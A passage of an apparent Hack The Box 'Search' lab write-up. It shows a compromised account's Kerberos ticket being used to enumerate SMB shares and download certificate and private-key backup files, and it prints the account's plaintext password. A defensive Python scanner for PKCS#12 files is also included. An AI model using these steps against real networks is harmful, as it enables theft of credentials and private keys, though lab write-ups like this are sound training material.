sierra.frye
Session
Checking the SMB access level of the sierra.frye user after compromising the account
┌──(kali㉿kali)-[~/archive/htb/labs/search]
└─$ KRB5CCNAME=sierra.frye@research.search.htb.ccache crackmapexec smb research.search.htb -k --use-kcache --kdcHost research.search.htb --shares
SMB research.search.htb 445 RESEARCH [*] Windows 10.0 Build 17763 x64 (name:RESEARCH) (domain:search.htb) (signing:True) (SMBv1:False)
SMB research.search.htb 445 RESEARCH [+] search.htb\ from ccache
SMB research.search.htb 445 RESEARCH [+] Enumerated shares
SMB research.search.htb 445 RESEARCH Share Permissions Remark
SMB research.search.htb 445 RESEARCH ----- ----------- ------
SMB research.search.htb 445 RESEARCH ADMIN$ Remote Admin
SMB research.search.htb 445 RESEARCH C$ Default share
SMB research.search.htb 445 RESEARCH CertEnroll READ Active Directory Certificate Services share
SMB research.search.htb 445 RESEARCH helpdesk
SMB research.search.htb 445 RESEARCH IPC$ READ Remote IPC
SMB research.search.htb 445 RESEARCH NETLOGON READ Logon server share
SMB research.search.htb 445 RESEARCH RedirectedFolders$ READ,WRITE
SMB research.search.htb 445 RESEARCH SYSVOL READ Logon server share
The sierra.frye user doesn’t appear to have any special or unique access.
I will still check the home directory of the user.
//research.search.htb/RedirectedFolders$
┌──(kali㉿kali)-[~/archive/htb/labs/search]
└─$ KRB5CCNAME=sierra.frye@research.search.htb.ccache impacket-smbclient SEARCH.HTB/@research.search.htb -no-pass -k -dc-ip $IP
Impacket v0.11.0 - Copyright 2023 Fortra
Type help for list of commands
# use RedirectedFolders$
# cd sierra.frye
# tree .
/sierra.frye/user.txt
/sierra.frye/Desktop/$RECYCLE.BIN
/sierra.frye/Desktop/desktop.ini
/sierra.frye/Desktop/Microsoft Edge.lnk
/sierra.frye/Desktop/user.txt
/sierra.frye/Documents/$RECYCLE.BIN
/sierra.frye/Documents/desktop.ini
/sierra.frye/Downloads/$RECYCLE.BIN
/sierra.frye/Downloads/Backups
/sierra.frye/Downloads/desktop.ini
/sierra.frye/Desktop/$RECYCLE.BIN/desktop.ini
/sierra.frye/Documents/$RECYCLE.BIN/desktop.ini
/sierra.frye/Downloads/$RECYCLE.BIN/desktop.ini
/sierra.frye/Downloads/Backups/search-RESEARCH-CA.p12
/sierra.frye/Downloads/Backups/staff.pfx
Finished - 17 files and folders
There is an interesting directory named Backups, which contains a PFX file and a P12 file.
PFX/P12
PFX (Personal Information Exchange) and P12 are file extensions for PKCS #12, a container format that holds a private key and its associated digital certificate. They are often used for securely storing and transporting cryptographic information, such as in SSL/TLS protocols.
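From the defender's side, the following added example (not part of the original write-up) recognises PKCS #12 containers by their DER header rather than by file extension, so a file server's user folders can be audited for key stores that were left behind. The function names and the SAMPLE_HEAD bytes are constructed for illustration, and only definite-length DER encoding is handled.

```python
import os

# contentType OIDs allowed for authSafe (RFC 7292): pkcs7-data, pkcs7-signedData
AUTHSAFE_OIDS = (bytes.fromhex("2a864886f70d010701"), bytes.fromhex("2a864886f70d010702"))
# Constructed header bytes for illustration, not taken from a real key store
SAMPLE_HEAD = bytes.fromhex("30820a00 020103 308209f0 0609 2a864886f70d010701")

def read_tlv(buf, pos):
    """Return (tag, value_start, value_end) for the DER TLV at pos."""
    if pos + 2 > len(buf):
        raise ValueError("truncated TLV header")
    tag, first = buf[pos], buf[pos + 1]
    pos += 2
    if first < 0x80:                       # short-form length
        length = first
    else:                                  # long form: next n bytes hold the length
        n = first & 0x7F
        if n == 0 or n > 4 or pos + n > len(buf):
            raise ValueError("unsupported or truncated length")
        length = int.from_bytes(buf[pos:pos + n], "big")
        pos += n
    return tag, pos, pos + length

def is_pkcs12(head):
    """True if head starts like PFX ::= SEQUENCE { version 3, authSafe ContentInfo, ... }."""
    try:
        tag, pos, _ = read_tlv(head, 0)          # outer PFX SEQUENCE
        vtag, v0, v1 = read_tlv(head, pos)       # version INTEGER, must be 3
        ctag, cpos, _ = read_tlv(head, v1)       # authSafe ContentInfo SEQUENCE
        otag, o0, o1 = read_tlv(head, cpos)      # contentType OID
    except ValueError:
        return False
    return ((tag, vtag, ctag, otag) == (0x30, 0x02, 0x30, 0x06)
            and head[v0:v1] == b"\x03" and head[o0:o1] in AUTHSAFE_OIDS)

def find_key_containers(root):
    """Walk root and return paths whose first bytes parse as PKCS #12."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                with open(path, "rb") as fh:
                    head = fh.read(64)
            except OSError:                # unreadable file: skip it
                continue
            if is_pkcs12(head):
                hits.append(path)
    return sorted(hits)
```

Because the check is structural, a key store renamed to another extension is still reported, while an X.509 certificate saved as `.pfx` is not.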
┌──(kali㉿kali)-[~/…/labs/search/smb/RedirectedFolders$]
└─$ smbget --recursive smb://research.search.htb/RedirectedFolders$/sierra.frye -U 'SEARCH.HTB/sierra.frye'
password for [search.htb\sierra.frye]: $$49=wide=STRAIGHT=jordan=28$$18
using domain: SEARCH.HTB, user: sierra.frye
smb://research.search.htb/RedirectedFolders$/sierra.frye/Desktop/$RECYCLE.BIN/desktop.ini
smb://research.search.htb/RedirectedFolders$/sierra.frye/Desktop/desktop.ini
smb://research.search.htb/RedirectedFolders$/sierra.frye/Desktop/Microsoft Edge.lnk
smb://research.search.htb/RedirectedFolders$/sierra.frye/Desktop/user.txt
smb://research.search.htb/RedirectedFolders$/sierra.frye/Documents/$RECYCLE.BIN/desktop.ini
smb://research.search.htb/RedirectedFolders$/sierra.frye/Documents/desktop.ini
smb://research.search.htb/RedirectedFolders$/sierra.frye/Downloads/$RECYCLE.BIN/desktop.ini
smb://research.search.htb/RedirectedFolders$/sierra.frye/Downloads/Backups/search-RESEARCH-CA.p12
smb://research.search.htb/RedirectedFolders$/sierra.frye/Downloads/Backups/staff.pfx
smb://research.search.htb/RedirectedFolders$/sierra.frye/Downloads/desktop.ini
smb://research.search.htb/RedirectedFolders$/sierra.frye/user.txt
Downloaded 9.61kB in 5 seconds
Downloading them to Kali for further analysis